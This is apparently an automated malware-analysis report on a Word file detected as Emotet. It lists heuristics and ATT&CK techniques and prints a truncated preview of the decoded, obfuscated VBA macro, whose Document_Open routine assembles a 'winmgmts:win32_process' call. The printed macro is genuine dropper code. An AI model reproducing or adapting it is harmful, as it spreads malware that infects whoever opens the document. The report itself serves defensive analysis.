MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and GetObject calls, indicative of malicious intent. ClamAV detection explicitly names this as Emotet. The VBA script, though obfuscated, appears to be designed to execute code, likely for downloading and running a secondary payload, which is a common Emotet tactic.
Heuristics 7
-
ClamAV: Doc.Malware.Emotet-9765432-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-9765432-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19074 bytes |
SHA-256: 5f8ddf3f75befd9059f3326eb9e354f14c2179c2257f61708817109610baf98e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sa837u25mqhc9y9f"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Yb_zm4cl2tdlp = Array(Mgjic3k0aluz + "Seci_4x29pddFt9igvfrvj8x5 B_azeyungyket" + Lu3fe1u3a4e0t3e7g, Dpv2810p36mk0cc, Qlih9c1fe16qptome.Qcr5w_bqiqx6, Aar2te5k_iugf + "Glsz0di1xbhz9zp26 Xg2dpqdbwk2 E4k_wb4jd0elopt5 D7josk0bf7bw")
End Sub
Attribute VB_Name = "Qlih9c1fe16qptome"
Attribute VB_Base = "0{157127A2-A3A5-4830-8E8F-878A36843948}{94967D22-A541-498D-9A71-A68AB3E3BA92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Qcr5w_bqiqx6()
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Ai53fcno2x7da9i5, 196, 1)
dYvJsnjw = Mid _
(V50kdktxy7d3fgnbre, 212, 1)
BiHOVG = Mid _
(Osw3ykfbx1lfxfa, 35, 1)
GQJzwq = Mid _
(Nvn90lesgkxw, 34, 1)
WKcaSvfi = Mid _
(Nbu5xksjcla9i7, 9, 1)
lsFUF = Mid _
(I2qxe_6qdgxiodvoyt, 240, 1)
VAwYHAcv = Mid _
(Cz2ma7t0qkn_2pg, 20, 1)
hNfbEKURZVE = Mid _
(L5_sryvrx_bd, 179, 1)
wYVOV = Mid _
(M9mox3jvoq3w, 190, 1)
mLdZb = Mid _
(Jg2g85h9evy, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Cqdkza5p4_n, 33, 1)
zmlHaKIVkFA = Mid _
(Pdx9vbni7qk, 168, 1)
UCPVYn = Mid _
(Srdi8hmmznumfl, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(L9gio41v5gjndhpf, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
M7hluppbo2go4j6q = 90
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Dqqjbvmxv82n7, 196, 1)
dYvJsnjw = Mid _
(Axekt5o0cue, 212, 1)
BiHOVG = Mid _
(Pt_ff2s6e2q9rff72, 35, 1)
GQJzwq = Mid _
(Xo8kmx3hu97go7fh_, 34, 1)
WKcaSvfi = Mid _
(Rp3_7b_jgh4oytilx, 9, 1)
lsFUF = Mid _
(Ylhmo9gu09nu3kgm, 240, 1)
VAwYHAcv = Mid _
(I_9t6lcruogj, 20, 1)
hNfbEKURZVE = Mid _
(Ydjqjyxla54lc, 179, 1)
wYVOV = Mid _
(Xxqthml7l1g, 190, 1)
mLdZb = Mid _
(Ze75t_kw_jl, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(As18lgei4kf5e, 33, 1)
zmlHaKIVkFA = Mid _
(Z9cc4tkfyspgl4aqb, 168, 1)
UCPVYn = Mid _
(Hes1wovfw0k1_b1y, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ju9r4b75ire, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Buv3a7s64z9g8cage2 = Lsoancly6yc2f3 + Chr$(M7hluppbo2go4j6q + (25))
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Ftuqena81o03bnwv, 196, 1)
dYvJsnjw = Mid _
(Mb73naxazmwoxay54d, 212, 1)
BiHOVG = Mid _
(Fsmes4vnceorlddoy, 35, 1)
GQJzwq = Mid _
(W5s8qqapsdnk, 34, 1)
WKcaSvfi = Mid _
(Gj4ope9o_4yv7l7lku, 9, 1)
lsFUF = Mid _
(Aw9jllc8dclsa4g, 240, 1)
VAwYHAcv = Mid _
(Fs1yj157b6mu, 20, 1)
hNfbEKURZVE = Mid _
(Ddht2jmlasdn, 179, 1)
wYVOV = Mid _
(Vlzlx3zgy5v7, 190, 1)
mLdZb = Mid _
(H3ciq0s20_d0j, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(V5g_xla7th2hu6_, 33, 1)
zmlHaKIVkFA = Mid _
(Hxxo0vj4be6r8l, 168, 1)
UCPVYn = Mid _
(Ioi6ns50vmpi6rj, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Q3r1rl7vjuo0sr, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
R8wpjw339nko5qn = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Buv3a7s64z9g8cage2 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + Qlih9c1fe16qptome.T7maztzkyy2gw96 + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Uj6uwsnkxq58, 196, 1)
dYvJsnjw = Mid _
(F0jdmfimwvt9ml4, 212, 1)
BiHOVG = Mid _
(Qyya1y597o31gqhn, 35, 1)
GQJzwq = Mid _
(Svkv8va65gzmxkg, 34, 1)
WKcaSvfi = Mid _
(P_3f76ueli9osfg, 9, 1)
lsFUF = Mid _
(Emx2sd2cyf8sf, 240, 1)
VAwYHAcv = Mid _
(Gevfwq
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.